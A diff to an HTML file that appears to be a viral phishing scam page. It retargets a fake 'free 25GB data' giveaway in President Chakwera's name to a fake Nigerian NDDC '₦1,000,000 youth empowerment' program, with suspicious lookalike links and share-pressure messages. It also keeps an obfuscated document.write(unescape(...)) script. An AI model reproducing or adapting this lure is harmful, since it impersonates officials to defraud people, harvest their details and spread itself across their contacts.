--- a/pg2.html
+++ b/pg2.html
@@ -397,9 +397,43 @@ button:hover {
     height: 56px;
 ">
 <option value="أختر نوع الشبكة" selected="1">---STATE OF ORIGIN---</option>
-  <option value="1">AIRTEL - 25GB + MWK10,000  </option>
-<option value="2"> TNM - 25GB + MWK10,000</option>
-  <option value="2"> Others - 25GB + MWK10,000  </option>
+  <option value="1">Abia State</option>
+<option value="2"> Adamawa State</option>
+  <option value="2">Akwa Ibom State</option>
+	 <option value="1">Anambra State </option>
+<option value="2">Bauchi State</option>
+  <option value="2"> Bayelsa State</option>
+	 <option value="1">Benue State</option>
+<option value="2">Borno State</option>
+  <option value="2"> Cross River State </option>
+	 <option value="1">Delta State </option>
+<option value="2"> Ebonyi State</option>
+  <option value="2"> Edo State </option>
+	 <option value="1">Ekiti State </option>
+<option value="2"> Enugu State</option>
+  <option value="2"> Gombe State </option>
+	 <option value="1">Imo State</option>
+<option value="2"> Jigawa State</option>
+  <option value="2"> Kaduna State</option>
+	 <option value="1">Kano State</option>
+<option value="2">Katsina State</option>
+  <option value="2"> Kebbi State</option>
+	 <option value="1">Kogi State</option>
+<option value="2"> Kwara State</option>
+  <option value="2"> Lagos State</option>
+	 <option value="1">Nasarawa State</option>
+<option value="2">Niger State</option>
+  <option value="2">Ogun State</option>
+	 <option value="1">Ondo State </option>
+<option value="2"> Osun State</option>
+  <option value="2"> Oyo State</option>
+	 <option value="1">Plateau State</option>
+<option value="2"> Rivers State</option>
+  <option value="2"> Sokoto State </option>
+	 <option value="1">Taraba State </option>
+<option value="2"> Yobe State</option>
+  <option value="2"> Zamfara State </option>
+	 <option value="1">Abuja (FCT)  </option>
 </select>
 </center><br>
           
@@ -566,7 +600,7 @@ $(document).click(function () {
 "*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
       <script>
-        var text1 = "*MOVEMENT FOR CHANGE PERSIDENT LAZARUS CHAKWERA IS GIVING 25GB FREE DATA AND MWK10,000 To supporters*%0A%0ALAZARUS CHAKWERA Organization partners with all network providers Give out 25GB Free Data and MWK10,000 Airtime Voucher to Supporters to use and rally online🎉%0A%0A*I just got mine get yours below*%0A%0A_FOR AIRTEL_👇%0Ahttps://chakwera.4gdata-plan.xyz/25GB %0A%0A_FOR TNM_👇 %0Ahttps://chakwera.4gdata-plan.xyz/25GB",
+        var text1 = "*NDDC ₦1,000,000 YOUTH EMPOWERMENT PROGRAM 2025*%0A_Application Ongoing..._%0A%0AThe Niger Delta Development Commission (NDDC), Chairman *Mr. Chiedu Ebie* Has Announce The Launch of its 2025 YOUTH EMPOWERMENT SCHEME.%0A_Every Nigerian is Eligible to Apply_%0A_Apply Now and Be Part of the Beneficiary_%0A%0AAPPLY NOW👇%0Ahttps://nddc-empowerment.alloffer.pro/gift",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
@@ -625,7 +659,9 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
     })();
 </script>
 
-
+ <center><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRW2XiNMy8o7WyyKwi3AmG7k38zAZriW2yTlLUWbmqzFB1o66IQCp37sKgvldG_qq3iDew&usqp=CAU" alt="Free-Data" style="width: 100%;">
+      
+                     </center>
 
  
 
